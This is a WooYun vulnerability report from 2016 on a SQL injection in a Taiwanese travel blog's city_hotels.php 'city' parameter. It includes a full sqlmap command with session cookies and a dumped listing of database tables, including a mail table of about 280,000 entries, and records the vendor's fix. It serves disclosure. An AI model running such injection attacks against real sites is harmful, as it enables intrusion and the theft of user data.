当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166981

漏洞标题:Via`s旅行札記某站存在SQL注入漏洞(28萬郵件信息洩露)(臺灣地區)

相关厂商:Via`s旅行札記

漏洞作者: Xmyth_夏洛克

提交时间:2016-01-03 12:22

修复时间:2016-01-12 15:41

公开时间:2016-01-12 15:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-03: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-12: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

存在SQL注入URL:
http://**.**.**.**/agoda/city_hotels.php?city=taipei

图片.png


city參數存在注入,單引號嘗試報錯

报错.png


放入sqlmap跑

sqlmap.py -u "http://**.**.**.**/agoda/city_hotels.php?city=taipei"  --cookie="_ga=GA1.2.584452688.1449899997; __auc=6d2d15a715194c6a3ffdf53d737; __utma=138364462.1515349163.1449903864.1449903864.1449903864.1; __utmz=138364462.1449903864.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=jl7cpm9p2deub21s48n01s8t45"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"


city.jpg

漏洞证明:

兩個庫

两个库.jpg


Database: viablog
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ip_count | 1591785 |
| ip_count201512 | 906112 |
| ip_count201509 | 718503 |
| ip_count201508 | 711875 |
| ip_count201506 | 682587 |
| ip_count201511 | 665705 |
| ip_count201505 | 663826 |
| ip_count201507 | 663226 |
| ip_count201510 | 635273 |
| ip_count201504 | 488446 |
| ip_count201503 | 477996 |
| ip_count201501 | 420908 |
| ip_count201502 | 408522 |
| ip_count201411 | 396811 |
| ip_count201412 | 369118 |
| ip_m_count201512 | 308741 |
| w_blog_mailto | 279021 |
| ip_count201408 | 275720 |
| ip_m_count201508 | 263351 |
| ip_m_count201509 | 252517 |
| ip_count201409 | 246778 |
| ip_count201410 | 245617 |
| ip_m_count201510 | 244103 |
| ip_count201407 | 243986 |
| ip_m_count201511 | 228868 |
| ip_m_count201507 | 223172 |
| ip_count201405 | 213236 |
| ip_count201406 | 209987 |
| ip_m_count201506 | 192599 |
| ip_m_count201505 | 188117 |
| w_push_blog | 158727 |
| ip_count201404 | 154298 |
| ip_m_count201407 | 151578 |
| ip_m_count201408 | 138165 |
| ip_count201403 | 133589 |
| ip_m_count201406 | 131886 |
| ip_count201402 | 126336 |
| ip_m_count201405 | 121928 |
| ip_m_count201403 | 114490 |
| ip_count201312 | 113413 |
| ip_count201401 | 112315 |
| ip_count201311 | 108745 |
| m_search201511 | 102152 |
| ip_count201310 | 101979 |
| ip_count201309 | 100370 |
| m_search201507 | 99263 |
| ip_m_count201404 | 98927 |
| m_search201512 | 98226 |
| ip_m_count201402 | 98036 |
| m_search201508 | 94185 |
| m_search201510 | 93443 |
| ip_m_count201401 | 89864 |
| ip_count201601 | 81673 |
| ip_m_count201311 | 80196 |
| m_search201509 | 78082 |
| ip_m_count201312 | 75818 |
| ip_m_count201310 | 72151 |
| ip_m_count201309 | 72063 |
| ip_count201308 | 49619 |
| w_counterrecord | 45439 |
| dt_search201512 | 38170 |
| dt_search201511 | 33200 |
| dt_search201507 | 32967 |
| dt_search201508 | 32795 |
| dt_search201510 | 28802 |
| ip_m_count201601 | 27500 |
| dt_search201509 | 25762 |
| w_club_todaycount | 18921 |
| ip_count201005 | 18400 |
| m_search201601 | 17163 |
| ip_count201111 | 16689 |
| ip_count201109 | 15813 |
| w_blog_board | 15809 |
| ip_count201003 | 15732 |
| ip_count201010 | 14951 |
| ip_count201112 | 14626 |
| ip_count201006 | 14555 |
| ip_count201004 | 14410 |
| ip_count201008 | 14329 |
| ip_count201007 | 13684 |
| ip_count201108 | 13610 |
| ip_count201011 | 13486 |
| ip_count201107 | 12988 |
| ip_count201012 | 12524 |
| ip_count201106 | 12411 |
| w_blog_extend | 12262 |
| ip_count201212 | 12205 |
| ip_count201002 | 11873 |
| ip_count201201 | 11394 |
| ip_count201105 | 11329 |
| ip_count201009 | 11172 |
| m_search201506 | 10432 |
| ip_count201204 | 10200 |
| ip_count201205 | 10167 |
| ip_count201202 | 9789 |
| ip_count201203 | 9665 |
| ip_count201206 | 8541 |
| ip_count201301 | 8196 |
| ip_count201104 | 8157 |
| ip_count201304 | 7957 |
| ip_count201110 | 7808 |
| ip_count201305 | 7730 |
| ip_count201303 | 7642 |
| blog_myfriendlog | 7477 |
| w_guestbook | 7421 |
| ip_count201302 | 7352 |
| ip_count201211 | 7197 |
| ip_count201210 | 6607 |
| dt_search201506 | 6598 |
| w_text_vote_sum | 6551 |
| ip_count201307 | 5979 |
| ip_m_count201504 | 5971 |
| ip_count201306 | 5630 |
| w_text_vote_record | 4451 |
| w_text_vote_sum2 | 4428 |
| room_class | 3375 |
| dt_search201601 | 3003 |
| w_blog_myfriend | 2425 |
| w_bloglist | 2082 |
| ip_m_count201308 | 2064 |
| room_class_2015bak | 1989 |
| w_bloglist_mobile | 1905 |
| w_bloglist_2015bak | 1897 |
| w_text_push_blog | 1795 |
| w_product_attrib | 1222 |
| w_hotels_todaycount | 877 |
| w_mobile_todaycount | 865 |
| w_county_h | 711 |
| w_member | 559 |
| w_bookmark | 556 |
| news | 443 |
| w_hotel_map_todaycount | 433 |
| w_maps_todaycount | 433 |
| w_ordertitles | 401 |
| w_county_h2 | 371 |
| postal_zone | 337 |
| w_adver | 335 |
| gallery_images | 329 |
| w_product_board | 308 |
| w_product | 303 |
| w_ordermain | 268 |
| syslog201412 | 257 |
| syslog201507 | 232 |
| syslog201308 | 225 |
| syslog201503 | 219 |
| syslog201311 | 188 |
| syslog201408 | 186 |
| syslog201409 | 183 |
| syslog201309 | 181 |
| syslog201312 | 176 |
| syslog201404 | 174 |
| syslog201410 | 172 |
| syslog201504 | 170 |
| syslog201401 | 169 |
| syslog201505 | 165 |
| syslog201511 | 163 |
| syslog201506 | 162 |
| syslog201407 | 155 |
| syslog201501 | 151 |
| syslog201509 | 149 |
| syslog201402 | 132 |
| syslog201403 | 132 |
| syslog201411 | 129 |
| syslog201310 | 128 |
| syslog201502 | 126 |
| syslog201406 | 125 |
| syslog201510 | 123 |
| weblog201506 | 121 |
| w_contact | 117 |
| syslog201512 | 108 |
| syslog201405 | 107 |
| w_adver2 | 97 |
| syslog201508 | 90 |
| w_blogcategory | 75 |
| w_blogcategory_mobile | 75 |
| w_category | 66 |
| w_agoda_city | 63 |
| w_blogcategory_agoda | 63 |
| w_service_list | 62 |
| w_active | 57 |
| w_bloglist_agoda | 54 |
| B2_pro | 52 |
| w_myfriend_text | 52 |
| w_bookmark_city | 48 |
| country | 47 |
| L2 | 44 |
| w_blog_bulletin | 41 |
| w_bookmark2_city | 34 |
| w_upload_image | 33 |
| w_class | 32 |
| w_system | 31 |
| weblog201007 | 29 |
| weblog201005 | 28 |
| website_config | 27 |
| ip_m_count201411 | 26 |
| bulletin | 24 |
| photo_class | 24 |
| w_job | 24 |
| w_link | 24 |
| w_favorite | 23 |
| weblog201002 | 23 |
| C2 | 22 |
| ip_m_count201412 | 22 |
| shopping_item | 22 |
| w_pay | 20 |
| weblog201004 | 19 |
| w_mobile_config | 18 |
| w_travel_club | 18 |
| w_web_config | 18 |
| L1 | 17 |
| L1_pro | 17 |
| L2_pro | 17 |
| w_payment | 17 |
| w_travel_content | 17 |
| weblog201012 | 17 |
| C1 | 16 |
| w_top_product | 16 |
| w_system_85inn | 15 |
| syslog201601 | 14 |
| weblog201111 | 14 |
| weblog201206 | 14 |
| weblog201508 | 13 |
| weblog201011 | 12 |
| weblog201201 | 12 |
| B1_pro | 11 |
| w_bookmark_board | 11 |
| weblog201001 | 11 |
| weblog201404 | 11 |
| w_forum_board | 10 |
| w_qa_list | 10 |
| w_travel_club_holiday | 10 |
| w_web_service | 10 |
| weblog201003 | 10 |
| weblog201010 | 10 |
| weblog201405 | 10 |
| club_shop_explain | 9 |
| w_forum_board_re | 9 |
| weblog201008 | 9 |
| w_company | 8 |
| weblog201105 | 8 |
| weblog201106 | 8 |
| weblog201107 | 8 |
| weblog201302 | 8 |
| weblog201403 | 8 |
| weblog201108 | 7 |
| weblog201212 | 7 |
| weblog201501 | 7 |
| w_agreement | 6 |
| w_edu | 6 |
| w_income | 6 |
| w_order_agreement | 6 |
| w_shop_explain | 6 |
| w_theme | 6 |
| weblog201210 | 6 |
| news_bar | 5 |
| w_adver_m | 5 |
| w_blogcategory2 | 5 |
| w_product_explain | 5 |
| w_qa | 5 |
| w_shop_pay | 5 |
| w_shop_return | 5 |
| weblog201102 | 5 |
| weblog201112 | 5 |
| weblog201205 | 5 |
| weblog201209 | 5 |
| weblog201211 | 5 |
| weblog201306 | 5 |
| weblog201308 | 5 |
| weblog201402 | 5 |
| weblog201411 | 5 |
| emp_info | 4 |
| w_auth | 4 |
| w_carrer | 4 |
| w_shop_freightage | 4 |
| w_shop_privacy | 4 |
| weblog201104 | 4 |
| weblog201202 | 4 |
| weblog201207 | 4 |
| weblog201303 | 4 |
| weblog201305 | 4 |
| weblog201307 | 4 |
| weblog201311 | 4 |
| weblog201503 | 4 |
| weblog201505 | 4 |
| syslog201302 | 3 |
| w_paynow_payment | 3 |
| w_top_todaycount | 3 |
| weblog201006 | 3 |
| weblog201101 | 3 |
| weblog201110 | 3 |
| weblog201203 | 3 |
| weblog201301 | 3 |
| weblog201304 | 3 |
| weblog201310 | 3 |
| weblog201401 | 3 |
| weblog201408 | 3 |
| weblog201409 | 3 |
| weblog201410 | 3 |
| weblog201504 | 3 |
| syslog201002 | 2 |
| w_album_board | 2 |
| weblog201309 | 2 |
| weblog201312 | 2 |
| weblog201406 | 2 |
| club_shop_explain2 | 1 |
| syslog201001 | 1 |
| syslog201003 | 1 |
| syslog201004 | 1 |
| syslog201005 | 1 |
| syslog201006 | 1 |
| syslog201007 | 1 |
| syslog201008 | 1 |
| syslog201009 | 1 |
| syslog201010 | 1 |
| syslog201011 | 1 |
| syslog201012 | 1 |
| syslog201101 | 1 |
| syslog201102 | 1 |
| syslog201103 | 1 |
| syslog201104 | 1 |
| syslog201105 | 1 |
| syslog201106 | 1 |
| syslog201107 | 1 |
| syslog201108 | 1 |
| syslog201109 | 1 |
| syslog201110 | 1 |
| syslog201111 | 1 |
| syslog201112 | 1 |
| syslog201201 | 1 |
| syslog201202 | 1 |
| syslog201203 | 1 |
| syslog201204 | 1 |
| syslog201205 | 1 |
| syslog201206 | 1 |
| syslog201207 | 1 |
| syslog201208 | 1 |
| syslog201209 | 1 |
| syslog201210 | 1 |
| syslog201211 | 1 |
| syslog201212 | 1 |
| syslog201301 | 1 |
| syslog201303 | 1 |
| syslog201304 | 1 |
| syslog201305 | 1 |
| syslog201306 | 1 |
| syslog201307 | 1 |
| w_agoda_config | 1 |
| w_auth_passwd | 1 |
| w_pcount | 1 |
| w_users | 1 |
| weblog201009 | 1 |
| weblog201204 | 1 |
| weblog201208 | 1 |
| weblog201407 | 1 |
| weblog201510 | 1 |
| weblog201512 | 1 |
+------------------------+---------+
400個庫,百萬數據,存在28萬郵件信息

邮件.png

修复方案:

過濾參數特殊字符

版权声明:转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-04 13:22

厂商回复:

感謝通報

最新状态:

2016-01-12:已修復